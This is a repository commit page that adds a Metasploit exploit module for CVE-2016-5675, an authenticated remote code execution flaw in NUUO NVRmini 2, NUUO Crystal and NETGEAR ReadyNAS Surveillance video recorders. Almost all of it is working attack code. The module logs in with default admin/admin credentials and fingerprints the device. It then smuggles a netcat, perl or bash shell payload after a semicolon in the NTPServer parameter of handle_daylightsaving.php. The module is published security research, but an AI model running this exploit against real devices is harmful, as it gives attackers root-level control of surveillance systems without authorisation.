Browse Source

add exploit for CVE 2016-5675

Pedro Ribeiro 3 years ago
parent
commit
0deac80d61
1 changed files with 178 additions and 0 deletions
  1. 178
    0
      modules/exploits/linux/http/nuuo_nvrmini_auth_rce.rb

+ 178
- 0
modules/exploits/linux/http/nuuo_nvrmini_auth_rce.rb View File

@@ -0,0 +1,178 @@
1
+##
2
+# This module requires Metasploit: http://metasploit.com/download
3
+# Current source: https://github.com/rapid7/metasploit-framework
4
+##
5
+
6
+# - test v_web_login_login_type string in NVRmini
7
+
8
+require 'msf/core'
9
+
10
+class MetasploitModule < Msf::Exploit::Remote
11
+  Rank = ExcellentRanking
12
+
13
+  include Msf::Exploit::Remote::HttpClient
14
+
15
+  def initialize(info = {})
16
+    super(update_info(info,
17
+      'Name'        => 'NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution',
18
+      'Description' => %q{
19
+        The NVRmini 2 Network Video Recorder, Crystal NVR and the ReadyNAS Surveillance application are vulnerable
20
+        to an authenticated remote code execution on the exposed web administration interface. An administrative
21
+        account is needed to exploit this vulnerability.
22
+        This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS.
23
+        This exploit has been tested on several versions of the NVRmini 2, Crystal and the ReadyNAS Surveillance.
24
+        It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested
25
+        in those devices.
26
+      },
27
+      'Author' =>
28
+        [
29
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
30
+        ],
31
+      'License' => MSF_LICENSE,
32
+      'References' =>
33
+        [
34
+          ['CVE', '2016-5675'],
35
+          ['US-CERT-VU', '856152'],
36
+          ['URL', 'TODO_GITHUB_URL'],
37
+          ['URL', 'TODO_FULLDISC_URL']
38
+        ],
39
+      'DefaultOptions' => { 'WfsDelay' => 5 },
40
+      'Platform' => 'unix',
41
+      'Arch' => ARCH_CMD,
42
+      'Privileged' => false,  # Runs as root in NVRmini 2 / Crystal, admin in ReadyNas
43
+      'Targets' =>
44
+        [
45
+          [ 'Automatic', { } ],
46
+          [ 'NUUO NVRmini 2', {
47
+            'Payload' =>
48
+              {
49
+                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
50
+                'DisableNops' => true,
51
+                'Compat'      =>
52
+                  {
53
+                    'PayloadType' => 'cmd',
54
+                    'RequiredCmd' => 'netcat generic perl'
55
+                  }
56
+              },
57
+          }],
58
+          [ 'ReadyNAS NETGEAR Surveillance', {
59
+            'Payload' =>
60
+              {
61
+                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
62
+                'DisableNops' => true,
63
+                'Compat'      =>
64
+                  {
65
+                    'PayloadType' => 'cmd',
66
+                    'RequiredCmd' => 'netcat generic perl'
67
+                  }
68
+              },
69
+          }],
70
+          [ 'NUUO Crystal', {
71
+            'Payload' =>
72
+              {
73
+                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
74
+                'DisableNops' => true,
75
+                'Compat'      =>
76
+                  {
77
+                    'PayloadType' => 'cmd',
78
+                    'RequiredCmd' => 'bash'
79
+                  }
80
+              },
81
+          }],
82
+        ],
83
+      'DefaultTarget' => 0,
84
+      'DisclosureDate' => 'Aug 4 2016'))
85
+
86
+    register_options(
87
+      [
88
+        Opt::RPORT(8081),
89
+        OptString.new('TARGETURI', [true,  "Application path", '/']),
90
+        OptString.new('USERNAME', [true, 'The username to login as', 'admin']),
91
+        OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']),
92
+      ], self.class)
93
+  end
94
+
95
+
96
+  def id_target
97
+    return target if target.name != 'Automatic'
98
+    res = send_request_cgi({
99
+      'uri' => normalize_uri(datastore['TARGETURI'])
100
+    })
101
+    if res && res.code == 200
102
+      if res.body.to_s =~ /var VENDOR_NAME = "Netgear";/
103
+        print_status("#{peer} - Identified NETGEAR ReadyNAS Surveillance as the target.")
104
+        return targets[2]
105
+      elsif res.body.to_s =~ /v_web_login_login_type/
106
+        print_status("#{peer} - Identified NUUO Crystal as the target.")
107
+        return targets[3]
108
+      else
109
+        print_status("#{peer} - Identified NUUO NVRMini 2 as the target.")
110
+        return targets[1]
111
+      end
112
+    end
113
+  end
114
+
115
+
116
+  def exploit
117
+    res = send_request_cgi({
118
+            'method' => 'POST',
119
+            'uri' => normalize_uri(datastore['TARGETURI'], "login.php"),
120
+            'vars_post' => {
121
+              'user' => datastore['USERNAME'],
122
+              'pass' => datastore['PASSWORD'],
123
+              'submit' => "Login"
124
+            }
125
+        })
126
+
127
+    if res && (res.code == 200 || res.code == 302)
128
+      cookie = res.get_cookies
129
+    else
130
+      fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.")
131
+    end
132
+
133
+    my_target = id_target
134
+    if my_target == targets[1]
135
+      if payload.raw.include?("perl")
136
+        fail_with(Failure::Unknown, "The NVRmini 2 only supports generic or netcat payloads.")
137
+      end
138
+      print_status("#{peer} - Executing payload...")
139
+      send_request_cgi({
140
+          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
141
+          'cookie' => cookie,
142
+          'vars_get' => {
143
+            'act' => "update",
144
+            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.encoded
145
+          }
146
+        }, 1)
147
+    elsif my_target == targets[2]
148
+      if payload.raw.include?("netcat")
149
+        fail_with(Failure::Unknown, "ReadyNAS Surveillance does not support netcat payloads.")
150
+      end
151
+      # We also have to fix the perl payload - there's an IO import error on the ReadyNAS that blows
152
+      # it up.
153
+      print_status("#{peer} - Executing payload...")
154
+      send_request_cgi({
155
+          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
156
+          'cookie' => cookie,
157
+          'vars_get' => {
158
+            'act' => "update",
159
+            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw.gsub("-MIO ", "-MIO::Socket ")
160
+          }
161
+        }, 1)
162
+    else
163
+      if not payload.raw.include?("exec")
164
+        fail_with(Failure::Unknown, "NUUO Crystal only supports bash payloads.")
165
+      end
166
+      print_status("#{peer} - Executing payload...")
167
+      send_request_cgi({
168
+          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
169
+          'cookie' => cookie,
170
+          'vars_get' => {
171
+            'act' => "update",
172
+            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw
173
+          }
174
+        }, 1)
175
+    end
176
+    handler
177
+  end
178
+end

Loading…
Cancel
Save